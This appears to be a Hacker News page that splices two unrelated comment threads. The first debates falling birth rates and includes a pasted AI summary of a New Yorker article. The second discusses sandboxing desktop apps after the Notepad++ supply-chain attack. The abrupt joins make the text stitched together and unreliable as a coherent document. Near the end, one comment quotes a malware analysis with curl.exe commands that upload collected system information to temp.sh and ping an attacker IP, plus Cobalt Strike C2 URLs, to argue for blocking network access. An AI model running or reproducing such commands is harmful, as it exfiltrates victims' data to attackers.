
New Yorker has a detailed article on this phenomenon that's a great read.

It busts many common myths.

https://www.newyorker.com/magazine/2025/03/03/the-population...


What are some of the myths they bust in that article, for those of us who can't see past the paywall?

One really common myth this article busts is about child care.

"Child care is virtually free in Vienna and extremely expensive in Zurich, but the Austrians and the Swiss have the same fertility rate."


Childcare can be nice to have but it can also be a full-time job just getting the kids there if you have more than a few.

We certainly take advantage of things like free preschool; but if we look at it objectively (and ignore benefits to the child) it consumes more time than if we didn't use it - getting him ready, walking him to school, picking him up, etc. Since it's free, we look at "time spent" and it's something like 2-3 hours spent to "get" 3 hours.


Minus the commute you had to do most of that anyway though, right? We get my four year old ready and walk her to school (city free pre-k a few blocks away, plus paid aftercare).

It takes about an hour to get breakfasted, dressed, and ready which we would be doing anyway. Counting the walk both ways it's about 30 minutes of extra time for 8 hours of childcare.

Unless your commute is just huge I can't see that math being true.


You got 8 hours out of it, we get maybe three - because of how it works out.

Add in infants and toddlers, and the fact that many places seem to do childcare for a very particular age range, and it can get hectic.

Workable, of course, anything is, but hectic. It can be understandable why people look at it from the outside and say "wow, that's a lot of kids, too many for me."


Yeah, haha fair. Even my friends with two look noticeably shell shocked most of the time. Good luck =)

Two kids are exponentially harder than one. Apparently it gets easier with three, but definitely not worth checking that out.

I don’t think the evidence either way is strong enough to call that one a myth. There are lots of other differences between the two countries that could offset the impact of Austria’s childcare subsidies.

There are plenty of longitudinal studies from various geographies, which I would summarize as “childcare subsidies increase birth rates in some contexts, but the effects are complex and depend on program specifics.” E.g. https://pmc.ncbi.nlm.nih.gov/articles/PMC2917182/ and https://clef.uwaterloo.ca/wp-content/uploads/2024/09/CLEF-07...


Just to expand a bit on Zurich, comparing it with Slovenia (another "very socialist" country).

Childcare in/around Zurich is (was 2 years ago) 2500 - 3000 CHF / month (lower prices after ~18 months). This is and isn't expensive. The list prices are high, but so are salaries (and taxes are low), and this is cheaper than rent (for 1 kid). Not subsidized.

In Slovenia, the full price is about 700 EUR / month, subsidised up to 77% by the government (i.e. by high-earners, effectively a double-progressive taxation with already high taxes).

What do you get for that price in Zurich? A lot! Kindergarten starts at 3 months and can take care of kids for the whole work day (7am-6pm). Groups are tiny, with lots of teachers - 3 adults per 12 kids. Groups are mixed-age as well, which I think is preferable. You also get a lot of flexibility - e.g. half-days (cheaper) or only specific days per week (e.g. Mon-Thu). Jobs are equally adaptable; a lot of people work 80% (so Friday is free to spend with the kid(s)).

In Slovenia, the situation is much worse. 2 teachers per 12 or even 20 kids (after age 4), age-stratified groups, childcare finishes at 5pm (but starts at 6am, if someone needs that...). Children are only welcome after 11 months of age. No flexibility at all. This is all for public childcare - we also looked at private, but generally you pay more (1000+ EUR) and get ... not much more. Maybe a nicer building (not even that), and groups are equally large (IMO the biggest drawback).

So as far as childcare is concerned, Switzerland is IMO much better.

But where Switzerland fucks you is elsewhere. As mentioned, tax is low, so that's a plus. But there's minimal maternity leave (hence kindergarten starts at 3 months). If women can, they take more time off work, but not everyone can. What I wrote above about "kindergarten" only applies until 4 years of age, after which "preschool" starts, which is government-funded and hence free. Well, "free". It ends at 12pm, after which you need to move your kid back into private childcare if you have a job. After that, school starts, which has a lunch break around 12pm as well - children are supposed to eat lunch at home - which again isn't really compatible with 2 working parents.

I'm not in Switzerland any more so I don't know how people actually manage when kids start school...


In the USA there's a definite "kid gap" around 4k-1st grade - before that, childcare if used is "open late" and flexible (if you have the cash) - and after 1st the kid is often mature enough to do simple movements on their own if school doesn't go long enough (walk to the library, or get into extra curricular activities, etc).

At 4k-1st you often have shortened hours, so if you're a working parent you need to arrange for transportation or be able to take long lunches, etc to move children from one place to another.

This "gap of annoyance" happens right about when you'd naturally be looking at a second or third kid as a possibility - I wonder how much effect it has on people.


I can only speak for myself, but 2 was a good number for me. This amounts to somewhat less than a replacement rate. My wife and I had enough time and energy to give the kids what they needed, and still have some for ourselves at the end of the day. And if either of the kids needed extra resources or attention, we were able to do it without neglecting the other one.

I am not worried about a population decline, to be honest. Even disregarding AI, improvements in technology and food production mean we can leverage resources in a way that would seem like magic to the people alive when my grandparents were born. I would rather take care of the people we have in this world - the whole world, not just my country - than see more people born into slums and poverty.

Even if there is a cliff, I don't think it's an existential crisis. I say without irony, I believe the market will adjust. Wages will go up in jobs that are needed, and workers will have more leverage and more mobility, socially and geographically. It's hard for me to see that as a bad thing.

Even if you believe that technology will let us keep pushing the earth's carrying capacity indefinitely, to what end? It doesn't seem like anyone has a real plan for expanding beyond 8 billion that isn't just a promise that we'll figure it out when we get there. We aren't taking care of the people we have now. Never mind the ones yet to be born.

I don't want to live in Brave New World and I also don't want to live in The Dosadi Experiment. And I don't want to condemn the future people to live like that either. I know those are works of fiction, but both seem plausible (in the general sense) at this point.

(Edit: not Brave New World. I am thinking about a story where people lived in dense arcologies with tight surveillance and social control surrounded by robotic farms. Sorry I can't remember.)


TL;DR: the article argues we cannot fix the population crisis with small tax breaks or traditional values, because the modern world has made the cost of raising a child too high for most people to want to try.

---

The article argues that the global drop in birth rates isn’t a moral failure or a biological accident, but a logical response to the pressures of modern life.

1. Myth: People are too selfish/liberal to have kids.

Reality: It’s not about hedonism. Instead, people are avoiding parenthood because life has become such a grind. In places like Korea, young people feel that bringing a child into such a hyper-competitive, expensive world is unfair to the child.

2. Myth: It’s a biological problem (low testosterone/chemicals).

Reality: There is no evidence that people can’t have kids physically. The issue is a lack of desire. It is a social and economic choice, not a medical one.

3. Myth: Women working is the cause.

Reality: Data show birth rates are actually higher in countries where women have more jobs and support. In countries where women stay home more (like parts of India), birth rates are still crashing. Work isn't the enemy; lack of support is.

4. Myth: Immigrants will replace the population.

Reality: Newcomers quickly adopt the habits of their new country. Within one generation, immigrant birth rates drop to match everyone else’s.

5. Myth: The government can just pay people to have babies.

Reality: South Korea spent $280 billion on this effort and the birth rate still hit record lows. Cash doesn't work if the overall culture is too stressful and gender roles remain fixated on old expectations.

e: moved TL;DR to the top.


> lack of support is

This is the key - but "support" often gets converted by the modern world into dollars, and there's no rational way to pay someone else to be the parent.

You need support to be much more than just monetary payments - nobody would think you're "supporting" someone going through a mental crisis or drug addiction by giving them a giant ball of cash; it might HELP in some way, but it's not really the totality of support.

Anyway if someone wants to send me a small portion of $280 billion I'll have more kids, you can even get pictures of them now and then! Looking to adopt rich grandparents ;)


> 4. Myth: Immigrants will replace the population.

> Reality: Newcomers quickly adopt the habits of their new country. Within one generation, immigrant birth rates drop to match everyone else’s.

That doesn't address the "myth". You can keep bringing more migrants and eventually replace the population.



I am at work and didn't have time to read the full article. Here's Gemini summary:

The article "The End of Children" (published in The New Yorker, March 2025) explores the global phenomenon of plummeting fertility rates, examining why traditional explanations and policy solutions are failing to reverse the trend. Here is a summary of the key points:

* Economic support isn't enough: The article challenges the popular liberal argument that fertility decline is primarily caused by economic insecurity or a lack of childcare. It points out that Nordic countries like Finland and Sweden - which offer generous parental leave, "baby boxes," and flexible work cultures - still face declining birth rates similar to or lower than the U.S. Even in places where childcare is free (Vienna) versus expensive (Zurich), fertility rates often remain identical.

* The "achievement culture" trap: The definition of "affording" a child has inflated significantly. In many wealthy, educated circles, raising a child now implies providing a suite of expensive advantages - individual bedrooms, travel sports, private lessons, and organic diets. This "intensive parenting" model means working mothers today actually spend more time on active childcare than stay-at-home mothers did in previous generations, making the prospect of parenthood feel overwhelming.

* Political and educational polarization: There is a widening fertility gap based on politics and education. Democrats and those with higher degrees are significantly more likely to be childless. This is partly attributed to the extended time required for education and career establishment, pushing childbearing to later years when it is biologically more difficult.

* Failed government interventions: The author highlights various aggressive attempts by governments to boost birth rates, such as Hungary's tax exemptions for mothers of four and South Korea's numerous "happiness projects" and subsidies. Despite spending fortunes, no modern nation has successfully reversed a low fertility rate back to replacement levels.

* A shift in meaning: The article concludes with a philosophical reflection on how children have transformed from a natural part of life into "variables" in a high-stakes lifestyle choice. They are increasingly viewed through the lens of identity and personal fulfillment, leading to a culture where parents fear judgment and non-parents fear being seen as selfish, intensifying the anxiety around having children at all.


Wow, I never thought I'd see the day on HN.....


I ended up writing my own sandbox so that it works on macOS as well and can be used for other tools (not just AI agents):

https://github.com/ashishb/amazing-sandbox


Curious to know what made you DIY this?


Tell me a better alternative that allows me to run, say, 'markdownlint', an npm package, on the current directory without giving access to the full system on macOS?


sandbox-exec -f curr_dir_access_profile.sb markdownlint


So you have to install the npm package markdownlint on your machine and let it run its potentially dangerous postinstall step?


You can customize curr_dir_access_profile.sb to block access to network/fs/etc. Why is this not enough?
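For the curious, a profile along those lines might look roughly like this. This is an illustrative sketch only - sandbox-exec ships with macOS but is officially deprecated, the rule names come from Apple's mostly undocumented SBPL dialect, and a real profile would need more read paths than shown:

```scheme
;; curr_dir_access_profile.sb -- illustrative sketch, not a vetted policy
(version 1)
(deny default)               ; anything not allowed below (incl. network) fails
(allow process-fork)
(allow process-exec*)
(allow file-read*            ; read-only system paths most tools need
    (subpath "/usr")
    (subpath "/bin")
    (subpath "/System/Library"))
(allow file-read* file-write*
    (subpath (param "CWD"))) ; full access only to the directory passed in
```

Invoked with something like `sandbox-exec -D CWD="$PWD" -f curr_dir_access_profile.sb markdownlint .`, so only the current directory is readable and writable by the tool.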


Some tools do require Internet access.

Further, I don't even want to take the risk of running 'npm install markdownlint' anymore on my machine.


I understand the concern. However, you can customize the profile (e.g., an allowlist) to only allow network access to required domains. Also, it looks like your sandboxing solution is Docker-based, which uses VMs on a Mac machine, but will not use VMs on a Linux machine (weaker isolation).


That's why I wrote my own sandbox. Everyone hand-waves these concerns.

Further, I don't know why docker is weak security on Linux. Are you telling me that one can exploit docker?


dockerd is a massive root-privileged daemon just sitting there, waiting for its moment. For local dev it’s often just unnecessary attack surface - one subtle kernel bug or namespace flaw, and it’s "hello, container escape". bwrap is much more honest in that regard: it’s just a syscall with no background processes and zero required privileges. If an agent tries to break out, it has to hit the kernel head-on instead of hunting for holes in a bloated docker API
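For concreteness, a bwrap invocation in that spirit might look like this (a sketch - it assumes bubblewrap is installed, and markdownlint-cli is just an example payload):

```shell
# Whole filesystem visible read-only; only the current directory writable;
# fresh /dev, /proc and /tmp; --unshare-all creates new namespaces, so the
# tool has no network and can't see other processes. (If the linter isn't
# already cached locally, add --share-net so npx can fetch it.)
bwrap --ro-bind / / \
      --dev /dev --proc /proc --tmpfs /tmp \
      --bind "$PWD" "$PWD" \
      --unshare-all --die-with-parent \
      npx markdownlint-cli .
```

No daemon, no root: if this process dies, the sandbox is simply gone.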


then use podman instead.
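E.g., for the markdownlint case upthread, rootless podman gives container isolation without a root daemon (a sketch; the image and tool names are just examples):

```shell
# Rootless and daemonless: the container sees only the mounted directory,
# and :ro makes even that read-only, which is enough for linting.
podman run --rm -v "$PWD":/work:ro -w /work \
    docker.io/library/node:lts npx --yes markdownlint-cli .
```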


I am running a lot of tools inside sandbox now for exactly this reason. The damage is confined to the directory I'm running that tool in.

There is no reason for a tool to implicitly access my mounted cloud drive directory and browser cookies data.


MacOS has been getting a lot of flak recently for (correct) UI reasons, but I honestly feel like they're the closest to the money with granular app permissions.

Linux people are very resistant to this, but the future is going to be sandboxed iOS style apps. Not because OS vendors want to control what apps do, but because users do. If the FOSS community continues to ignore proper security sandboxing and distribution of end user applications, then it will just end up entirely centralised in one of the big tech companies, as it already is on iOS and macOS by Apple.


It also has persistent permissions.

Think about it from a real world perspective.

I knock on your door. You invite me to sit with you in your living room. I can't easily sneak into your bedroom. Further, my temporary access ends as soon as I exit your house.

The same should happen with apps.

When I run 'notepad dir1/file1.txt', the package should not sneakily be able to access dir2. Further, as soon as I exit the process, the permission to access dir1 should end as well.


A better example would be requiring the mailman to obtain written permission to step on your property every day. Convenience trumps maximal security for most people.


The early version of UAC in Windows did that…

Asking continuously is worse than not asking at all…


Some of the stuff that I install is actually meant to behave like malware.

But fine, lock Windows down for normal users, as long as I can still disable all the security. We don't need another Apple.


I would configure the mailman with permanent write access to the mailbox area.

That's what I do with my sandbox right now.


With systemd or firejail it's quite easy to do this sort of thing on linux.
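For example (sketches - the flag names are real, but tune them to taste; some systemd sandboxing directives need unprivileged user namespaces to work in --user mode):

```shell
# firejail: the target directory becomes the only visible "home", no network
firejail --private="$PWD" --net=none markdownlint .

# systemd-run: run a command as a transient, sandboxed unit; ProtectSystem=
# strict mounts everything read-only except the paths you punch through.
# (Home is still readable here; add ProtectHome= for a stricter setup.)
systemd-run --user --pipe --wait \
    -p ProtectSystem=strict -p ReadWritePaths="$PWD" \
    -p PrivateTmp=yes -p NoNewPrivileges=yes \
    markdownlint .
```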


Attempt at a real-life version (starting from the idea that they are actually not trustworthy):

  - You invite someone to sit in your living room
    - There must have been a reason to begin with (or why invite them at all)
    - Implied (at least limited) trust of whoever was invited
  - Access enabled and information gained heavily depends on house design
    - May have to walk past many rooms to finally reach the living room
    - Significant chances to look at everything in your house
    - Already allows skilled appraiser to evaluate your theft worthiness
  - Many techniques may allow further access to your house
    - Similar to digital version (leave something behind)
      - Small digital object accessing home network
      - "Sorry, I left something, mind if I search around?"
    - Longer con (advance to next stage of "friendship" / "relationship", implied trust)
      - "We should hang out again / have a cards night / go drinking together / etc..."
      - Flattery "Such a beautiful house, I like / am a fan of <madlibs>, could you show it to me?"
  - Already provides a survey of your home security
    - Do you lock your doors / windows?
    - What kind / brand / style do you have?
    - Do you tend to just leave stuff open?
    - Do you have onsite cameras or other features?
    - Do you easily just let anybody into your house who asks?
    - General cleanliness and attention to security issues

  - In the case of Notepad++, they would also be offering you a free product
    - Significant utility vs alternatives
    - Free
    - Highly recommended by many other "neighbors"
  - In the case of Notepad++, they themselves are not actively malicious (or at least not known to be)
    - Single developer
    - Apparently frazzled and overworked by the experience
    - Makes what updates they can, yet also supports a free product for millions.
    - It doesn't really work with the friend you invite in scenario (more like they sneezed in your living room or something)


> When I run 'notepad dir1/file1.txt', the package should not sneakily be able to access dir2.

What happens if the user presses ^O, expecting a file open dialog that could navigate to other directories? Would the dialog be somehow integrated to the OS and run with higher permissions, and then notepad is given permissions to the other directory that the user selects?


Pretty sure that’s how it works on iOS. The app can only access its own sandboxed directory. If it wants anything else, it has to use a system provided file picker that provides a security scoped url for the selected file.


It's also how it works on macOS and even on modern Windows if you are running sandboxed apps.


Yes, UIDocumentPickerViewController is 10+ years old at this point.

There’s also a similar photos picker (PHPicker) which is especially good from 2023 on. Signal uses this for instance.


> Linux people are very resistant to this

Because security people often do not know the balance between security and usability, and we end up with software that is crippled and annoying to use.


I think we could get a lot further if we implement proper capability based security. Meaning that the authority to perform actions follows the objects around. I think that is how we get powerful tools and freedom, but still address the security issues and actually achieve the principle of least privilege.

For FreeBSD there is capsicum, but it seems a bit inflexible to me. Would love to see more experiments on Linux and the BSDs for this.


FreeBSD used to have an ELF target called "CloudABI" which used Capsicum by default. Parameters to a CloudABI program were passed in a YAML file to a launcher that acquired what was in practice the program's "entitlements"/"app permissions" as capabilities that it passed to the program when it started.

I had been thinking of a way to avoid the CloudABI launcher. The entitlements would instead be in the binary object file, and only reference command-line parameters and system paths. I have also thought of an elaborate scheme with local code signing to verify that only user/admin-approved entitlements get lifted to capabilities.

However, CloudABI got discontinued in favour of WebAssembly (and I got side-tracked...)

Redox is also moving towards having capabilities mapped to fd's, somewhat like Capsicum. Their recent presentation at FOSDEM: https://fosdem.org/2026/schedule/event/KSK9RB-capability-bas...


Seems like a bad time to bring this up when it wouldn't have helped with this attack at all.


A capability model wouldn't have prevented the compromised binary from being installed, but it would totally prevent that compromised binary from being able to read or write to any specific file (or any other system resource) that Notepad++ wouldn't have ordinarily had access to.


ELI5, what is that supposed to mean?


The original model of computer security is "anything running on the machine can do and touch anything it wants to".

A slightly more advanced model, which is the default for OSes today, is to have a notion of a "user", and then you grant certain permissions to a user. For example, for something like Unix, you have the read/write/execute permissions on files that differ for each user. The security mentioned above just involves defining more such permissions than were historically provided by Unix.

But the holy grail of security models is called "capability-based security", which is above and beyond what any current popular OS provides. Rather than the current model which just involves talking about what a process can do (the verbs of the system), a capability involves talking about what a process can do an operation on (the nouns of the system). A "capability" is an unforgeable cryptographic token, managed by the OS itself (sort of like how a typical OS tracks file handles), which grants access to a certain object.

Crucially, this then allows processes to delegate tasks to other processes in a secure way. Because tokens are cryptographically unforgeable, the only way that a process could have possibly gotten the permission to operate on a resource is if it were delegated that permission by some other process. And when delegating, processes can further lock down a capability, e.g. by turning it from read/write to read-only, or they can e.g. completely give up a capability and pass ownership to the other process, etc.

https://en.wikipedia.org/wiki/Capability-based_security
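Unix file descriptors are a small, everyday instance of the idea: once a process holds an open descriptor, access flows from the handle rather than from ambient path permissions, and the handle can be passed to children (or over sockets) but not forged. A minimal shell sketch:

```shell
tmp=$(mktemp)
echo "secret" > "$tmp"

exec 3< "$tmp"     # acquire a read "capability": an open descriptor
chmod 000 "$tmp"   # revoke ambient (path-based) authority

# A fresh open by path now fails (for a non-root user)...
cat "$tmp" 2>/dev/null || echo "open by path: denied"

# ...but the capability we already hold still works:
cat <&3            # prints: secret

chmod 600 "$tmp"; rm -f "$tmp"
```

Note also that a descriptor opened read-only can never be upgraded to read-write - a crude form of the attenuated delegation described above.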


> Linux people are very resistant to this, but the future is going to be sandboxed iOS style apps.

Linux people are NOT resistant to this. Atomic desktops are picking up momentum and people are screaming for it. Snaps, flatpaks, appimages, etc. are all moving in that direction.

As for plain development, sadly, the OS developers are simply ignoring the people asking. See:

https://github.com/containers/toolbox/issues/183

https://github.com/containers/toolbox/issues/348

https://github.com/containers/toolbox/issues/1470

I'll leave it up to you to speculate why.

Perhaps getting a bit of black eye and some negative attention from the Great Orange Website(tm) can light a fire under some folks.


Yet we look at phones, and we see people accepting outrageous permissions for many apps: they might rely on snooping on you for ads, or anything else, and yet the apps sell, and have no problem staying in stores.

So when it's all said and done, I do not expect practical levels of actual isolation to be that great.


> Yet we look at phones, and we see people accepting outrageous permissions for many apps

The data doesn't support the suggestion that this is happening on any mass scale. When Apple made app tracking opt-in rather than opt-out in iOS 14 ("App Tracking Transparency"), 80-90% of users refused to give consent.

It does happen more when users are tricked (dare I say unlawfully defrauded?) into accepting, such as when installing Windows, when launching Edge for the first time, etc. This is why externally-imposed sandboxing is a superior model to Zuck's pinky promises.


In the case of iOS, the choice was to use the app with those permissions or without them, so of course people prefer to not opt-in - why would they?

But when the choice is between using the app with such spyware in it, or not using it at all, people do accept the outrageous permissions the spyware needs.


For all its other problems, App Store review prevents a lot of this: you have to explain why your app needs entitlements A, B and C, and they will reject your update if they don't think your explanation is good enough. It's not a perfect system, but iOS applications don't actually do all that much snooping.


Sand-boxing such as in Snap and Flatpak?


Snap and Flatpak do both sandboxing and package management.

You can use the underlying sandboxing with bwrap. A good alternative is firejail. They are quite easy to use.

I prefer to centralize package management to my distro, but I value their sandboxing efforts.

Personally, I think it's time to take sandboxing seriously. Supply chain attacks keep happening. Defense in depth is the way.


Notoriously not actually secure, at least in the case of Flatpak. (Can't speak to Snap)

Not sure how something can be called a sandbox without the actual box part. As Siri is to AI, Flatpak is to sandboxes.


I assumed the primary feature of Flatpak was to make a “universal” package across all Linux platforms. The security side of things seems to be a secondary consideration. I assume that the security aspect is now a much higher priority.


The XDG portal standards being developed to provide permissions to apps (and allow users to manage them), including those installed via Flatpak, will continue to be useful if and when the sandboxing security of Flatpaks are improved. (In fact, having the frontend management part in place is kind of a prerequisite to really enforcing a lot of restrictions on apps, lest they just stop working suddenly.)


Doesn't it use bwrap under the hood? what's wrong with that?


Many apps require unnecessarily broad permissions with Flatpak. Unlike Android and iOS apps they weren't designed for environments with limited permissions.
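The flip side is that Flatpak permissions are at least inspectable and user-overridable, e.g. (the app ID below is a placeholder):

```shell
# See what an app is granted
flatpak info --show-permissions org.example.SomeApp

# Tighten it for your user: drop home access and cut the network
flatpak override --user --nofilesystem=home --unshare=network org.example.SomeApp
```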


> Unlike Android

My experience with android apps seems to be different. Every other app seems to be asking for contacts or calling or access to files.


You can usually deny those. If they ask for them without a good reason, that's already suspicious.


It's truly perverse that, at the same time that desktop systems are trying to lock down what trusted, conventional native apps can and cannot do and/or access, you have the Chrome team pushing out proposals to expand what browsers allow websites to do to the user's file system, like silently/arbitrarily reading and writing to the user's disk—gated only behind a "Are you sure you want to allow this? Y/N"-style dialog that, for extremely good reasons, anyone with any sense about design and interaction has strongly opposed for the last 20+ years.


I intensely hate that a stupid application can modify .bashrc and permanently persist itself.

Sure, in theory, SELinux could prevent this. But seems like an uphill battle if my policies conflict with the distro’s. I’d also have to “absorb” their policies’ mental model first…


I tend to think things like .bashrc or .zshrc are bad ideas anyways. Not that you asked but I think the simpler solution is to have those files be owned by root and not writable by the user. You're probably not modifying them that often anyways.
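A blunt version of that, as a sketch (assumes Linux with sudo; edits to the files then require a deliberate privileged step):

```shell
sudo chown root:root ~/.bashrc ~/.profile
sudo chmod 644 ~/.bashrc ~/.profile   # you can still read; only root writes
# On ext4 and friends, an immutable flag that even root must clear first:
sudo chattr +i ~/.bashrc
```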


> getting a lot of slack recently

I think you mean a lot of flak? Slack would kind of be the opposite.


Haha, yes, corrected. Thank you. I have a habit of fusing unrelated expressions.


Flatpak


I'm sure that will contribute to the illusion of security, but in reality the system is thoroughly backdoored on every level from the CPU on up, and everyone knows it.

There is no such thing as computer security, in general, at this point in history.


> but in reality the system is thoroughly backdoored on every level from the CPU on up, and everyone knows it.

Indeed. Why lock your car door when anyone can unlock and steal it by learning lock-picking?


Residents of San Francisco ask themselves that question all the time.


There's a subtlety that's missing here: if your threat model doesn't include the actors who can access those backdoors, then computer security isn't so bad these days.

That subtlety is important because it explains how the backdoors have snuck in — most people feel safe because they are not targeted, so there's no hue and cry.


The backdoors snuck in because literally everyone is being targeted. Few people ever see the impact of that themselves or understand the chain of events that brought those impacts about.


And yet, many people perceive a difference between “getting hacked” and “not getting hacked” and believe that certain precautions materially affect whether or not they end up having to deal with a hacking event.

Are they wrong? Do gradations of vulnerability exist? Is there only one threat model, “you’re already screwed and nothing matters”?


I'm sure you're right; however, there is still a distinction between the state using my device against me and unaffiliated or foreign states using my device against me or more likely simply to generate cash for themselves.

It's still worth solving one of these problems.


A distinction without a difference. One mafia is as bad as another. One screws you in the short term, the other screws you in the long term, and much worse.

The problem in both cases is the massive attack surface at every level of the system. Most of these proposals about "security" are just rearranging deckchairs on the Titanic.

If you can't keep a nation state out (and you're referring to your own state, right?) then you can't keep a lone wolf hacker out either, because in either case that's who's doing the work.


I almost feel like this should just be the default for all applications. I don't need them to escape out of a defined root. It's almost like your documents and application are effectively locked together. You have to give permission for an app to extract data from outside of the sandbox.

Linux has this capability, of course. And it seems like MacOS prompts me a lot for "such and such application wants to access this or that". But I think it could be a lot more fine-grained, personally.


I've been arguing for this for years. There's no reason every random binary should have unfettered, invisible access to everything on my computer as if it were me.

iOS and Android both implement these security policies correctly. Why can't desktop operating systems?


The short answer is tech debt. The major mobile OSes got to build a new third party software platform from day 0 in the late 2000s, one which focused on and enforced priorities around power consumption and application sandboxing from the getgo etc.

The most popular desktop OSes have decades of pre-existing software and APIs to support and, like a lot of old software, the debt of choices made a long time ago that are now hard/expensive to put right.

The major desktop OSes are to some degree moving in this direction now (note the ever increasing presence of security prompts when opening "things" on macOS etc etc), but absent a clean-sheet approach abandoning all previous third-party software like the mobile OSes got, this arguably can't happen easily overnight.


Mobile platforms are entirely useless to me for exactly this reason, individual islands that don't interact to make anything more generally useful. I would never use any os that worked like that, it's for toys and disposable software only imo.


Mobile platforms are far more secure than desktop computing software. I'd rather do internet banking on my phone than on my computer. You should too.

We can make operating systems where the islands can interact. It just needs to be opt-in instead of opt-out. A bad Notepad++ update shouldn't be able to invisibly read all of Thunderbird's stored emails, add backdoors to projects I'm working on, or cryptolocker my documents. At least not without my say-so.

I get that permission prompts are annoying. There are some ways to do the UI aspect better, like having the open-file dialog automatically pass along permissions for the opened file. But these are the minority of cases. Most programs only need access to their own stuff. Having an OS confirmation for the few applications that need to escape their island would be a much better default. Still allow all the software we use today, but block a great many of these attacks.
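The dialog-grants-permission idea can be sketched as a tiny broker (all names here are hypothetical, just for illustration): the app has no ambient filesystem access, and the trusted OS file picker is the only thing that can mint a grant.

```python
# Toy sketch of a picker-based permission broker: apps get no ambient
# filesystem access; the trusted file dialog is what grants a capability
# for exactly the path the user chose.
class FileBroker:
    def __init__(self):
        self._grants = {}  # app name -> set of allowed paths

    def user_picked(self, app, path):
        """Called by the trusted OS dialog, never by the app itself."""
        self._grants.setdefault(app, set()).add(path)

    def open_file(self, app, path):
        if path not in self._grants.get(app, set()):
            raise PermissionError(f"{app} was never granted {path}")
        return f"<handle for {path}>"


broker = FileBroker()
broker.user_picked("editor", "/home/me/notes.txt")
broker.open_file("editor", "/home/me/notes.txt")  # allowed: user picked it
try:
    broker.open_file("editor", "/home/me/.ssh/id_ed25519")  # never picked
except PermissionError:
    pass  # blocked by default
```

This is roughly what the XDG Desktop Portal file chooser does on Linux, just with the plumbing hidden.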


Both are true, and both should be allowed to exist as they serve different purposes.

Sound engineers don't use lossy formats such as MP3 when making edits in preproduction work, as those are intended for end users and would degrade quality cumulatively. In the same way, someone working on software shouldn't be required to use an end-user consumption system when they are at work.

It would be unfortunate to see the nuance missed: just because a system isn't "new" doesn't mean it needs to be scrapped.


I mostly agree but ...

> In the same way someone working on software shouldn't be required to use an end-user consumption system when they are at work.

I'm worried that many software developers (including me, a lot of the time) will only enable security after exhausting all other options. So long as there's a big button labeled "Developer Mode" or "Run as Admin" which turns off all the best security features, I bet lots of software will require that to be enabled in order to work.

Apple has quite impressive frameworks for application sandboxing. Do any apps use them? Do those DAWs that sound engineers use run VST plugins in a sandbox? Or do they just dyld + call? I bet most of the time it's the latter. And look at this Notepad++ attack. The attack would have been stopped dead if the update process validated digital signatures. But no, it was too hard, so instead they got their users' computers hacked.

I'm a pragmatist. I want a useful, secure computing environment. Show me how to do that without annoying developers and I'm all in. But I worry that the only way a proper capability model would be used would be by going all in.
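On the update-signing point: even a crude integrity check changes the story. A toy sketch in Python, with hash pinning of a known payload standing in for a real public-key signature check (all values made up):

```python
import hashlib

# Toy sketch of update validation. Pinning a known digest stands in for
# a real public-key signature check, which is what an updater would
# actually need; the point is that tampered bytes are rejected.
PINNED_SHA256 = hashlib.sha256(b"official update bytes").hexdigest()

def safe_to_install(payload: bytes) -> bool:
    """Refuse any payload whose digest doesn't match the pinned value."""
    return hashlib.sha256(payload).hexdigest() == PINNED_SHA256

assert safe_to_install(b"official update bytes")
assert not safe_to_install(b"official update bytes" + b"\x00backdoor")
```

In a real updater the digest (or signature) would ship over a separate trusted channel, signed with the vendor's private key; this sketch only shows the reject-on-mismatch step.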


A middle ground (maybe even closer to more limited OS design principles) exists. It is not just toys. Otherwise neither UWP on Windows, nor Flatpak, nor Firejail would exist, nor would systemd implement containerization features.

In such a scenario, you can launch your IDE from your application manager and then only give it write access to specific folders for a project. The IDE's configuration files can also be stored in isolated directories. You can still access them with your file manager or your terminal app, which are "special" and need to be approved by you once (or for each update). You may think, "How do I even share my secrets like Git SSH keys?" Well, that's why we need services like the SSH agent or the Freedesktop secret storage spec. Windows already has this, by the way, as secret vaults; they have been there since at least Windows 7, maybe even Vista.


Windows has had this for over a decade, but no one wants to put their application in a sandbox.


If a sandbox is optional then it is not really a good sandbox

Naturally, even Flatpak on Linux suffers from this, as legacy software simply doesn't have a concept of permission models, and this cannot be bolted on after the fact.


The containers are literally the "bolting on". You need to give the illusion that the software is running under a full OS, but you can actually mount the system directories as read-only.


And you still need to mount volumes and add all sorts of holes in the sandbox for applications to work correctly and/or be useful.

Try to run GIMP inside a container, for example: you'll have to give it access to your ~/Pictures or whatever for it to be useful.

Compare that to some photo-editing applications on Android/iOS, which can work without having filesystem access by getting the file through the OS file picker.


What we need is a model similar to Google+ circles if anyone can remember that.

Basically a thing that I could assign 1) apps and 2) content to. Apps can access all content in all circles they are assigned to. Circles can overlap arbitrarily so you can do things like having apps A,B,C share access to documents X,Y but only A,B have access to Z etc.
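As a toy model of those circles (names made up for illustration): an app can access a document exactly when the two share at least one circle.

```python
# Toy "circles" access model: apps and documents are each assigned to
# circles; access is granted iff the intersection is non-empty.
app_circles = {"A": {"work", "media"}, "B": {"work", "media"}, "C": {"media"}}
doc_circles = {"X": {"media"}, "Y": {"media"}, "Z": {"work"}}

def can_access(app: str, doc: str) -> bool:
    return bool(app_circles[app] & doc_circles[doc])

# A, B, C all share access to X and Y, but only A and B can reach Z.
assert all(can_access(a, d) for a in "ABC" for d in "XY")
assert can_access("A", "Z") and can_access("B", "Z")
assert not can_access("C", "Z")
```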


And then there's D-Bus…

Damn, file protection alone is not even enough…


They tried. And the rent seekers made a huge noise against it.


Running apps in a sandbox is OK, but remember to disable internet access. A text editor should not require it, and it can be used to exfiltrate the text(s) you're editing.

    When started, it sends a heartbeat containing system information to the attackers. This is done through the following steps:

    3. Then it uploads the 1.txt file to the temp[.]sh hosting service by executing the curl.exe -F "file=@1.txt" -s https://temp.sh/upload command;
    4. Next, it sends the URL to the uploaded 1.txt file by using the curl.exe --user-agent "https://temp.sh/ZMRKV/1.txt" -s http://45.76.155[.]202
--

    The Cobalt Strike Beacon payload is designed to communicate with the cdncheck.it[.]com C2 server. For instance, it uses the GET request URL https://45.77.31[.]210/api/update/v1 and the POST request URL https://45.77.31[.]210/api/FileUpload/submit.
--

    The second shellcode, which is stored in the middle of the file, is the one that is launched when ProShow.exe is started. It decrypts a Metasploit downloader payload that retrieves a Cobalt Strike Beacon shellcode from the URL https://45.77.31[.]210/users/admin


A sandbox in Windows? How?


Not what the OP is referring to, but UWP and successor apps were always sandboxed, from the time of Windows 8 onwards. This was derived from the Windows Mobile model, which in turn was emulating the Android/iOS app model.


https://learn.microsoft.com/en-us/windows/security/applicati...

Or the easier way with an external tool is using Sandboxie: https://sandboxie-plus.com/


The real lock-in is stars, not reliability [1].

